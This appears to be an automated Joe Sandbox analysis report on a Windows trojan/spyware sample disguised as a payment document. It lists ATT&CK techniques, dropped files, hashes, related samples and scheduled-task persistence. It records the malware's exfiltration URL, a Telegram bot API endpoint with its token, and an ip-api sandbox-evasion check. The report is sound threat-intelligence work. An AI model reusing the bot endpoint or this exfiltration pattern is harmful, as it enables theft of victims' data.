Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	261 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	261 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	111 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Wire slip account payable.pif.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.Taskun
Wire slip account payable.pif.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\EQVRGq.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\EQVRGq.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.Taskun

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ip-api.com	208.95.112.1	true	false		high
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendDocument	false		high
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://www.apache.org/licenses/LICENSE-2.0	Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com	Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designersG	Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/?	Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn/bThe	Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	false	high
https://account.dyn.com/	Wire slip account payable.pif.exe, 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp	false	high
https://api.telegram.org	Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002D0E000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.000000000318E000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.00000000030C5000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers?	Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.tiro.com	Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers	Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/	Wire slip account payable.pif.exe, 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp	false	high
http://www.goodfont.co.kr	Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	Wire slip account payable.pif.exe, EQVRGq.exe.0.dr	false	high
http://www.carterandcone.coml	Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sajatypeworks.com	Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.typography.netD	Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/cabarga.htmlN	Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn/cThe	Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.galapagosdesign.com/staff/dennis.htm	Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn	Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/frere-user.html	Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.jiyu-kobo.co.jp/	Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://ip-api.com	Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.galapagosdesign.com/DPlease	Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers8	Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fonts.com	Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sandoll.co.kr	Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.urwpp.deDPlease	Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.zhongyicts.com.cn	Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://api.telegram.org	Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002D0E000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.000000000318E000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.00000000030C5000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Wire slip account payable.pif.exe, 00000000.00000002.1739600975.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 00000009.00000002.1783883607.00000000029AB000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sakkal.com	Wire slip account payable.pif.exe, 00000000.00000002.1742697410.0000000005750000.00000004.00000020.00020000.00000000.sdmp, Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	false
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1560051
Start date and time:	2024-11-21 11:01:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	Wire slip account payable.pif.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@21/15@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 179 Number of non-executed functions: 20
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: Wire slip account payable.pif.exe

Simulations

Behavior and APIs

Time	Type	Description
05:02:02	API Interceptor	7360511x Sleep call for process: Wire slip account payable.pif.exe modified
05:02:05	API Interceptor	47x Sleep call for process: powershell.exe modified
05:02:07	API Interceptor	5250620x Sleep call for process: EQVRGq.exe modified
10:02:05	Task Scheduler	Run new task: EQVRGq path: C:\Users\user\AppData\Roaming\EQVRGq.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	HnJdZm51Xl.exe	Get hash	malicious	Amadey, Clipboard Hijacker	Browse	ip-api.com/line/
	file.exe	Get hash	malicious	JasonRAT	Browse	ip-api.com/json/?fields=11827
	Fulloption_V2.1.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	BoostFPS.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	New_Order_Inquiry.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	seethebestthingswithgreatsituationshandletotheprogress.hta	Get hash	malicious	Cobalt Strike, AgentTesla, HTMLPhisher	Browse	ip-api.com/line/?fields=hosting
	DHL_Doc.9787653446578978656879764534576879764545766456.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	Get hash	malicious	AgentTesla, HTMLPhisher	Browse	ip-api.com/line/?fields=hosting
	file.exe	Get hash	malicious	Unknown	Browse	ip-api.com/line/
	file.exe	Get hash	malicious	Unknown	Browse	ip-api.com/line/
149.154.167.220	Order requirements CIF Greece_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	Documents.pdf.exe	Get hash	malicious	MassLogger RAT	Browse
	DEVIS_VALIDE.js	Get hash	malicious	XWorm	Browse
	PayeeAdvice_HK54912_R0038704_37504.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	GST DRC-01A - DIN-20230359XL050081843E_msg.exe	Get hash	malicious	GuLoader	Browse
	Quote document and order list.exe	Get hash	malicious	GuLoader	Browse
	new order #738833.exe	Get hash	malicious	GuLoader	Browse
	FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	114117914 - Rebound Electronics.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	http://christians-google-sh-97m2.glide.page/dl/d0a5f4	Get hash	malicious	Unknown	Browse	208.95.112.2
	HnJdZm51Xl.exe	Get hash	malicious	Amadey, Clipboard Hijacker	Browse	208.95.112.1
	file.exe	Get hash	malicious	JasonRAT	Browse	208.95.112.1
	Fulloption_V2.1.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	BoostFPS.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	New_Order_Inquiry.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	seethebestthingswithgreatsituationshandletotheprogress.hta	Get hash	malicious	Cobalt Strike, AgentTesla, HTMLPhisher	Browse	208.95.112.1
	DHL_Doc.9787653446578978656879764534576879764545766456.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	Get hash	malicious	AgentTesla, HTMLPhisher	Browse	208.95.112.1
	file.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
api.telegram.org	Order requirements CIF Greece_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Documents.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	DEVIS_VALIDE.js	Get hash	malicious	XWorm	Browse	149.154.167.220
	PayeeAdvice_HK54912_R0038704_37504.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	GST DRC-01A - DIN-20230359XL050081843E_msg.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	Quote document and order list.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	new order #738833.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	114117914 - Rebound Electronics.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Order requirements CIF Greece_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	eddzD2MA12.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	Documents.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	DEVIS_VALIDE.js	Get hash	malicious	XWorm	Browse	149.154.167.220
	PayeeAdvice_HK54912_R0038704_37504.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	GST DRC-01A - DIN-20230359XL050081843E_msg.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	Quote document and order list.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	new order #738833.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
TUT-ASUS	http://christians-google-sh-97m2.glide.page/dl/d0a5f4	Get hash	malicious	Unknown	Browse	208.95.112.2
	HnJdZm51Xl.exe	Get hash	malicious	Amadey, Clipboard Hijacker	Browse	208.95.112.1
	file.exe	Get hash	malicious	JasonRAT	Browse	208.95.112.1
	Fulloption_V2.1.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	BoostFPS.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	New_Order_Inquiry.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	seethebestthingswithgreatsituationshandletotheprogress.hta	Get hash	malicious	Cobalt Strike, AgentTesla, HTMLPhisher	Browse	208.95.112.1
	DHL_Doc.9787653446578978656879764534576879764545766456.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsx	Get hash	malicious	AgentTesla, HTMLPhisher	Browse	208.95.112.1
	file.exe	Get hash	malicious	Unknown	Browse	208.95.112.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	LummaC	Browse	149.154.167.220
	Order requirements CIF Greece_pdf.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com	Get hash	malicious	Unknown	Browse	149.154.167.220
	DATASHEET.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	datasheet.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	datasheet.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	ORDER 20240986 OA.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO#8329837372938383839238PDF.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC	Browse	149.154.167.220
	https://ollama.com/	Get hash	malicious	Unknown	Browse	149.154.167.220

Process:	C:\Users\user\AppData\Roaming\EQVRGq.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wire slip account payable.pif.exe.log

Download File

Process:	C:\Users\user\Desktop\Wire slip account payable.pif.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380747059108785
Encrypted:	false
SSDEEP:	48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZmUyus:lGLHxvIIwLgZ2KRHWLOuggs
MD5:	1A350305979C319A4159E5B381F62182
SHA1:	31AF25FE595FE8079FFC0F3A2815A7F2E7D3A9AF
SHA-256:	618CBCE901A674CF90F7A5DCF514F309283463B9623FE762533B3DCD38A1DFB3
SHA-512:	A7662EF37D17505282498B663D62429CDB7F39406D7F723F28D3939B2A43FFD826F73DA4923E0B665AECEA8FCC8E8080B4C8465C23B32AB7EB4CC7AEA95AE850
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ypxrbms.yze.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lv25mif.uv5.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5njz4ciw.ht5.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_adexolz3.0ml.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_li32tpuz.cnu.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_njlbv4uw.ugk.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pwi1m25g.lp3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
